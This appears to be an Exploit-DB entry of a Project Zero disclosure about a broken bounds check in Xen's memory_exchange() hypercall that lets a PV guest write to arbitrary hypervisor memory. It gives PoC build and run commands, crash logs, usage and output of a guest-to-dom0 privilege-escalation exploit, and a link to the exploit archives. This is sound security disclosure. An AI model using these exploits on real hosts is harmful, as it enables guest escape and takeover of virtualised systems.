Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout

EDB-ID: 41870
Platform: Multiple
Date: 2017-04-11

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184

This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.

The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:

    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    {
        rc = -EFAULT;
        goto fail_early;
    }

guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:

    /*
     * Valid if in +ve half of 48-bit address space, or above
     * Xen-reserved area.
     * This is also valid for range checks (addr, addr+size). As long
     * as the start address is outside the Xen-reserved area then we
     * will access a non-canonical address (and thus fault) before
     * ever reaching VIRT_START.
     */
    #define __addr_ok(addr) \
        (((unsigned long)(addr) < (1UL<<47)) || \
         ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

    #define access_ok(addr, size) \
        (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

As the comment states, when the address points to guest memory,
access_ok() checks only the start address and ignores the size. This
relies on the assumption that any caller of access_ok() will access
guest memory linearly, starting at the supplied address. Callers that
want to access a subrange of the memory referenced by a guest handle
are supposed to use guest_handle_subrange_okay() instead of
guest_handle_okay(); it takes an additional start offset parameter.
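The behaviour described above can be illustrated with a small
standalone model. This is only a sketch, not Xen code: the model_*
names are hypothetical, the compat argument translation area is left
out, and the value used for HYPERVISOR_VIRT_END is an assumption about
the x86-64 layout that should be checked against the Xen tree in use.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed end of the Xen-reserved area on x86-64 (verify for your tree). */
#define MODEL_HYPERVISOR_VIRT_END 0xffff880000000000ULL

/* Model of __addr_ok(): only the start address is inspected. */
static bool model_addr_ok(uint64_t addr)
{
    return addr < (1ULL << 47) || addr >= MODEL_HYPERVISOR_VIRT_END;
}

/*
 * Model of access_ok() without the compat translation range.
 * The size argument is accepted but never looked at.
 */
static bool model_access_ok(uint64_t addr, uint64_t size)
{
    (void)size;
    return model_addr_ok(addr);
}
```

In this model, model_access_ok(0x1000, UINT64_MAX) returns true even
though the range would run far past guest memory, which is safe only
if the caller really does start accessing at the supplied address.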

memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.

Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as

    exch.out.extent_start + 8 * exch.nr_exchanged

where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.


I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next page fault to escalate to a double fault. To run the PoC, unpack
it in a normal 64-bit PV domain and run the following commands in the
domain as root:

root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/crashpoc/built-in.o
  CC [M]  /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
  LD [M]  /root/crashpoc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
  CC      /root/crashpoc/test.mod.o
  LD [M]  /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test

The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:

(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0  x86_64  debug=n  Tainted:    C ]----
(XEN) CPU:    0
(XEN) RIP:    e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202   CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0   rbx: 00007fffe9cfd160   rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001   rsi: 0000000000000004   rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158   rsp: 00007fffe9cfaf30   r8:  0000557b46f7df00
(XEN) r9:  0000557b46f7dec0   r10: 0000557b46f7df00   r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040   r13: 00007fffe9cfb0c0   r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70   cr0: 0000000080050033   cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000   cr2: 00007fffe9cfaf93
(XEN) ds: 0000   es: 0000   fs: 0000   gs: 0000   ss: e02b   cs: e033
(XEN) 
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN) 
(XEN) Reboot in five seconds...


I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.
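As a rough illustration of the first suggestion, a check with the
stricter semantics could validate both ends of the range. This is a
sketch under assumptions, not a proposed patch: the strict_* names and
SKETCH_* constants are hypothetical, the compat translation area is
ignored, and the layout constants should be verified against the Xen
tree in use.

```c
#include <stdbool.h>
#include <stdint.h>

#define SKETCH_GUEST_LOW_END (1ULL << 47)
#define SKETCH_HV_VIRT_END   0xffff880000000000ULL /* assumed layout */

/* True only if every byte of [addr, addr + size) passes the check. */
static bool strict_range_ok(uint64_t addr, uint64_t size)
{
    uint64_t last;

    if (size == 0)
        return true;                 /* empty range: nothing to access */
    last = addr + (size - 1);
    if (last < addr)
        return false;                /* range wraps around 2^64 */
    if (last < SKETCH_GUEST_LOW_END)
        return true;                 /* entirely in the lower half */
    return addr >= SKETCH_HV_VIRT_END; /* entirely above the reserved area */
}

/* Validates elements [0, first + count) of an array starting at base. */
static bool strict_subrange_ok(uint64_t base, uint64_t elem_size,
                               uint64_t first, uint64_t count)
{
    uint64_t total;

    if (count > UINT64_MAX - first)
        return false;                /* first + count overflows */
    total = first + count;
    if (elem_size != 0 && total > UINT64_MAX / elem_size)
        return false;                /* byte length overflows */
    return strict_range_ok(base, total * elem_size);
}
```

With a check of this shape, a large start offset such as an
attacker-chosen exch.nr_exchanged would be rejected, because the range
it implies no longer fits inside guest-accessible memory.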

Proof of Concept: xen_memory_exchange_crashpoc.tar 

################################################################################

I have written an exploit (attached).

Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):


root@pv-guest:~/privesc_poc# ./compile.sh 
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/privesc_poc/built-in.o
  CC [M]  /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
  LD [M]  /root/privesc_poc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
  CC      /root/privesc_poc/test.mod.o
  LD [M]  /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#  


dmesg in the unprivileged PV guest:


[  721.413415] call_int_85 at 0xffffffffc0075a90
[  721.420167] backstop_85_handler at 0xffffffffc0075a93
[  722.801566] PML4 at ffff880002fe3000
[  722.808216] PML4 entry: 0x13bba4067
[  722.816161] ### trying to write crafted PUD entry...
[  722.824178] ### writing byte 0
[  722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[  722.840254] write_byte_hyper successful
[  722.848234] ### writing byte 1
[  722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[  722.864219] write_byte_hyper successful
[  722.872241] ### writing byte 2
[  722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[  722.889014] write_byte_hyper successful
[  722.896232] ### writing byte 3
[  722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[  722.912599] write_byte_hyper successful
[  722.920246] ### writing byte 4
[  722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[  722.938554] write_byte_hyper successful
[  722.944231] ### writing byte 5
[  722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[  722.961769] write_byte_hyper successful
[  722.968221] ### writing byte 6
[  722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[  722.984319] write_byte_hyper successful
[  722.992233] ### writing byte 7
[  723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[  723.008341] write_byte_hyper successful
[  723.016254] ### writing byte 8
[  723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[  723.032254] write_byte_hyper successful
[  723.040236] ### crafted PUD entry written
[  723.048199] dummy
[  723.056199] going to link PMD into target PUD
[  723.064238] linked PMD into target PUD
[  723.072206] going to unlink mapping via userspace PUD
[  723.080230] mapping unlink done
[  723.088251] copying HV and user shellcode...
[  723.096283] copied HV and user shellcode
[  723.104270] int 0x85 returned 0x7331
[  723.112237]   remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[  723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[  723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[  723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[  723.144291] int 0x85 returned 0x1337
[  723.152235] === END ===


The supplied shell command executes in dom0 (and all other 64-bit PV domains):


root@ubuntu:~# cat /tmp/owned_by_the_guest 
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 


Note that the exploit doesn't clean up after itself: shutting down the attacking domain will panic the hypervisor.


I have tested the exploit in the following configurations:

configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu

configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3

Proof of Concept: privesc_poc.tar.gz 

################################################################################

Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip